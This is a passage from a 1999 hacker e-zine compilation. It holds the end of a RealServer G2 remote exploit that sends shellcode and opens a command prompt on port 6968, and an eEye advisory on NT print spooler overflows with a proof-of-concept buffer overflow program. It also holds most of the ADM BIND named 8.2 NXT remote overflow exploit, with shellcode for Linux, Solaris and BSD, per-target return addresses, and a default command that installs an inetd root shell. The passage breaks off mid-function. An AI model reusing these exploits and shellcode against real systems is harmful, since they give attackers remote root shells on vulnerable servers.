"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"
"QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"
"6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"
"AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"
"IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"
"28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"
"wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"
"QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"
"/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"
"19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"
"vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"
"84fyZ/////w==\x0d\x0a\x0d\x0a\x00";
int
main (int argc, char **argv)
{
int socket;
char *server;
unsigned short int port;
struct sockaddr_in sa;
if (argc != 3) {
printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n"
"by dark spyrit <dspyrit@beavuh.org>, port by team teso\n\n"
"usage: %s <host> <admin_port>\n"
"eg - %s host.com 6666\n"
"the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]);
exit (EXIT_FAILURE);
}
server = argv[1];
port = atoi (argv[2]);
socket = net_connect (&sa, server, port, 45);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}
write (socket, sploit, strlen (sploit));
sleep (1);
close (socket);
printf ("data sent. try \"telnet %s 6968\" now \n", server);
exit (EXIT_SUCCESS);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
@HWA
51.0 NT Print spooler vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Printer (spooler) Service Vulnerabilities
Systems Affected:
Any NT system with a printer or the ability to print to a network printer.
Microsoft Windows NT 4.0 Workstation, Server, Terminal Server (all service
packs)
Release Date:
November 4, 1999
Advisory Code:
AD11041999
Description:
It was a typical day in eEye land... the beer was cold, the day was long,
the exploit... well the exploit was a joke started by a client. "The day you
guys can hack my network via it's printer is the day I call it quits." A
joke at first... the ability to remotely and locally compromise an NT
network via a printer. What started off as a joke was going to turn into
reality. Ten or so minutes after taking a look at the NT printer service we
had already found a way to compromise any windows NT server or workstation
that had a printer attached to it or the ability to print to a network
printer.
The Windows NT Spooler service (Spoolss.exe), (used for various printing
activities), contains a number of security holes that allow for data
overflows. These vulnerabilities are evident when someone passes data to
various spooler service API's and spoolss.exe does not check the size of the
receiving buffer to make sure it can hold the incoming
data. The API, explained in more detail below, can only be exploited
locally. However, some of the overflows could be exploited remotely.
Example of one of the exploitable API's:
First thing to note about the API in question is that it can only be
executed if you are a "Power User". So for this example, if you were to
write exploit code for this API overflow you could only elevate your access
from a Power User to SYSTEM level. Which is still a very bad thing. However,
as explained earlier, there are other places where the spooler service
overflows and cases that do not require you to be at the power user level.
----spoolss.c----
#include <windows.h>
#include <winspool.h>
int main()
{
char bigbuffer[3000];
int i;
strcpy(bigbuffer,"\\\\");
for(i=0;i<2000;i++)
strcat(bigbuffer,"A");
AddPrintProcessor(NULL,NULL,bigbuffer,bigbuffer);
return(0);
}
----spoolss.c----
In this example, the overflow is in AddPrintProcessor. When "bigbuffer" is
passed to the spooler service, it tries to stuff 2000 instances of the
character "A" into a buffer that cannot handle an amount of data that size
and therefore overflows. Also you will notice when it overflows that EIP is
00410041. This is because the bytes have been changed into wide byte
(Unicode) format. Do not be deceived by this... it is still exploitable. :-]
There exists another vulnerability in the spooler service that allows any
local user to load their own dll's and have them executed by the spooler
service with SYSTEM level access therefore allowing any local user to gain
total control of the local machine.
The vulnerability is in AddPrintProvidor(). Microsoft has a very good
description in their advisory of what a print provider is and why the
vulnerability exists and other detailed information. So instead of
regurgitating that information we will give you detailed information on
exploiting the hole and an example exploit including source.
http://www.eeye.com/html/Advisories/spoolsploit.zip
A brief word about w00giving:
w00giving is being put on by none other then the security team w00w00.
w00giving is a joint effort of various security groups and individuals who
are going to be releasing advisories,exploits and tools through out November
and into December. eEye is participating in w00giving so over the next few
weeks of November we plan to release either an advisory or tool once a week.
This printer advisory is our first offering and we hope you enjoy it.
Fixes:
X86:
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-U
S/Q243649.exe
Alpha:
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/ALPHA/EN
-US/Q243649.exe
Windows NT 4.0 Server, Terminal Server Edition: To be released shortly
Related Links:
Retina - The Network Security Scanner
http://www.eEye.com/retina/
Smarter. Faster. Sexier.
w00w00 - w00giving
http://www.datasurge.net/www.w00w00.org/
Greetings:
Attrition,w00w00,beavuh,ADM,Rhino9,L0pht,Wiretrip, and HNN. krystalia
1971-1999
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole
or any part of this alert in any other medium excluding electronic medium,
please e-mail alert@eEye.com for permission.
Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com
@HWA
52.0 Bind remote exploit (ADM)
~~~~~~~~~~~~~~~~~~~~~~~~~
Note: "We broke this just a little in order to raise the bar on using it
(just slightly).. If you'd like to test it on your own box, put a shell
in /adm/sh, or /adm/ksh for solaris on the target machine."
/*
* ADM CONFIDENTIAL -- (ADM Confidential Restricted when
* combined with the aggregated modules for this product)
* OBJECT CODE ONLY SOURCE MATERIALS
* (C) COPYRIGHT ADM Crew. 1999
* All Rights Reserved
*
* This module may not be used, published, distributed or archived without
* the written permission of the ADM Crew. Please contact your local sales
* representative.
*
* ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez
*
* "a misanthropic anthropoid with nothing to say"
*
* thanks to stran9er for sdnsofw.c
*
* Intel exploitation is pretty straightforward.. should give you a remote
* shell. The shellcode will break chroot, do a getpeername on all open
* sockets, and dup to the first one that returns AFINET. It also forks and
* runs a command in case the fd duping doesn't go well. Solaris/SPARC is a
* bit more complicated.. we are going through a well trodden part of the
* code, so we don't get the context switch we need to have it populate the
* register windows from the stack. However, if you just hammer the service
* with requests, you will quickly get a context switch at the right time.
* Thus, the SPARC shellcode currently only breaks chroot, closes current
* fd's and runs a command.
* Also, the NetBSD shellcode doesn't break chroot because they stop the
* dir tricks. Of course, they allow mknods in chrooted environments, so
* if named is running as root, then it still might be expoitable.
* The non-exec stack patch version returns into a malloc'ed buffer, whose
* address can vary quite alot. Thus, it may not be as reliable as the other
* versions..
*
* We broke this just a little in order to raise the bar on using it
* (just slightly).. If you'd like to test it on your own box, put a shell
* in /adm/sh, or /adm/ksh for solaris on the target machine.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x61,0x64,0x6d,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d};
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,
0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
struct arch
{
int id;
char *name;
char *code;
int codesize;
unsigned long safe;
unsigned long ret;
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode,
sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode,
sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738,
0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000,
0xefffe5d0, 11000},
{5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1,
0xbfbfbdb8, 7000},
{6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1,
0xefbfbb00, 7000},
{7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1,
0xefbfbb00, 7000},
{0, 0, 0, 0}
};
int arch=0;
char *command=0;
/* these two dns routines from dspoof/jizz */
/* pull out a compressed query name */
char *dnssprintflabel(char *s, char *buf, char *p)
{
unsigned short i,len;
char *b=NULL;
len=(unsigned short)*(p++);
while (len) {
while (len >= 0xC0) {
if (!b)
b=p+1;
p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
len=(unsigned short)*(p++);
}
for (i=0;i<len;i++)
*(s++)=*(p++);
*(s++)='.';
len=(unsigned short)*(p++);
}
*(s++)=0;
if (b)
return(b);
return(p);
}
/* store a query name */
char *dnsaddlabel(char *p, char *label)
{
char *p1;
while ((*label) && (label)) {
if ((*label == '.') && (!*(label+1)))
break;
p1=strchr(label,'.');
if (!p1)
p1=strchr(label,0);
*(p++)=p1-label;
memcpy(p,label,p1-label);
p+=p1-label;
label=p1;
if (*p1)
label++;
}
*(p++)=0;
return(p);
}
void make_overflow(char *a)
{
int i;
unsigned long *b;
unsigned char *c;
char sbuf[4096];
if (archlist[arch].safe==0) /* linux */
{
memset(a,0x90,4134);
memcpy(a+3500,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3500+archlist[arch].codesize, command);
else
strcpy(a+3500+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else if (archlist[arch].safe==1) /* bsd */
{
memset(a,0x90,4134);
memcpy(a+3300,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3300+archlist[arch].codesize, command);
else
strcpy(a+3300+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else /*SPARC*/
{
memset(a,0x0,11000);
b=(unsigned long*)(a+4438);
for (i=0;i<1500;i++)
*b++=htonl(0xac15a16e);
c=(char *)b;
for (i=0;i<archlist[arch].codesize;i++)
*c++=archlist[arch].code[i];
if (command)
strcpy(c, command);
else
strcpy(c, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" \
>>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob ");
b=(unsigned long*)(a+4166);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i5 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o0 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o6 - significant
*b++=htonl(archlist[arch].ret); //o7 - retaddr
}
}
int form_response(HEADER *packet, char *buf)
{
char query[512];
int qtype;
HEADER *dnsh;
char *p;
char *walker;
memset(buf,0,sizeof(buf));
dnsh = (HEADER *) buf;
dnsh->id = packet->id;
dnsh->qr=1;
dnsh->aa=1;
dnsh->qdcount = htons(1);
